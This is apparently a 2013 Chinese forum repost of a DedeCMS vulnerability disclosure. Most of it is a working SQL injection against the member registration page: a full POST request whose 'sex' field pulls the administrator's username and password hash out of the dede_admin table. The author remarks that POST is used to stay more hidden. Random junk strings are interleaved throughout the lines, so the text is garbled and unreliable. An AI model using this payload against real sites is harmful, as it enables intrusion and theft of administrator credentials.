漏洞类型: SQL注射漏洞1 n$ G2 @% P. k. Z
简要描述:2 N, b, g9 x) v* ~3 W9 W4 Z
* Z& R/ q' E @: d8 C% X需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
5 y6 s: I$ a+ J$ R/ s, t" |3 C原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
" V5 {9 M& y+ _0 [5 p# Y% q1 Y详细说明:跟这个漏洞
( O; C( S; G+ m9 r % ~0 h5 y* m5 ^% X
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
0 W& J* O; @! z是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
4 A: c4 z! N9 @* @: O# ~( K% BPOST提交以下数据,其实不用POST提交的,这样隐蔽点.$ y/ q6 v8 B( }" i2 r
0 F3 N* Y! Y& A! m. W4 f1 w
www.political-security.com/member/reg_new.php% i3 }. {# H$ S" \3 c
/ J6 M9 h1 \9 b+ n% S# ]+ a
POST, b& {( X1 C. h, b- \9 E
; L- E7 ^* j# B8 k# |3 M q
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
2 A, }7 k6 [3 U0 n5 ^7 p7 }userid=c4rp3nt3r&uname=c4rp3nt3r
% }0 i; ~, d7 m' z% X2 h&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss s. L* f( H5 |5 l' P2 i
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
3 U1 d- v8 W( N(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
t O+ ^5 Z, @$ ?9 @%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对